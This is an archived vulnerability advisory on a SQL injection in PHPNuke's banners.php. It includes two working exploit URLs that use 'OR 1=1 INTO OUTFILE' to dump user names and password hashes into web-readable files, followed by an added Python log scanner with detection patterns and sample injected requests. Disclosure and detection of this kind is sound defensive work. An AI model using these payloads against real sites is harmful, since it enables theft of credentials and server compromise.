

Title: PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
Published: 2003-03-22-12:00AM
Updated: 2003-03-22-09:10PM
Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: No
Credit: Discovery credited to "Frog Man" <leseulfrog@hotmail.com>.
Vulnerable:
  Francisco Burzi PHPNuke 6.5 RC3
  Francisco Burzi PHPNuke 6.5 RC2
  Francisco Burzi PHPNuke 6.5 RC1
  Francisco Burzi PHPNuke 6.5
  Francisco Burzi PHPNuke 6.0
  Francisco Burzi PHPNuke 5.6
Not Vulnerable:
Code: The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>:

This will save id, name and crypted password into
http://www.example.com/banners1.txt :
http://www.example.com/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt

This will save crypted password into http://[target]/banners2.txt :
http://www.example.com/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt
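
A log check for the two request shapes above, as an added example that is not part of the original advisory: it flags banners.php requests whose login or cid value carries a quote, an OR tautology or INTO OUTFILE. The log lines, addresses and file path are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows carrying the injected SQL.
WATCHED = {"login", "cid"}
# Fragments present in the advisory's requests. DUMPFILE is added here as the
# sibling MySQL clause; it does not appear in the advisory.
PATTERNS = {
    "quote": re.compile(r"'"),
    "or_tautology": re.compile(r"\bOR\s+(\d+)\s*=\s*\1\b", re.I),
    "into_outfile": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I),
}
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan(lines):
    """Return (line_no, parameter, matched pattern names) per suspicious hit."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/banners.php"):
            continue
        # parse_qs undoes %XX and '+' encoding before the patterns are applied.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in sorted(WATCHED.intersection(params)):
            for value in params[name]:
                found = sorted(k for k, rx in PATTERNS.items() if rx.search(value))
                if found:
                    hits.append((no, name, found))
    return hits

# Constructed sample: addresses, timestamps and /var/www/html are made up.
INJ = "%27%20OR%201=1%20INTO%20OUTFILE%20%27/var/www/html/"
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Mar/2003:10:00:01 +0000] "GET /banners.php?op=Ok&login=acme HTTP/1.0" 200 900',
    '192.0.2.44 - - [22/Mar/2003:10:02:17 +0000] "GET /banners.php?op=Ok&login=' + INJ + 'banners1.txt HTTP/1.0" 200 512',
    '192.0.2.44 - - [22/Mar/2003:10:02:40 +0000] "GET /banners.php?op=Change&cid=' + INJ + 'banners2.txt HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Mar/2003:10:05:09 +0000] "GET /index.php?login=O%27Brien HTTP/1.0" 200 700',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on `into_outfile` is also a cue to look in the web root for the written file, since the request itself returns nothing unusual.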



Copyright 2007, SecurityDot
Sat, 19 Dec 2009 04:20:04 +0000
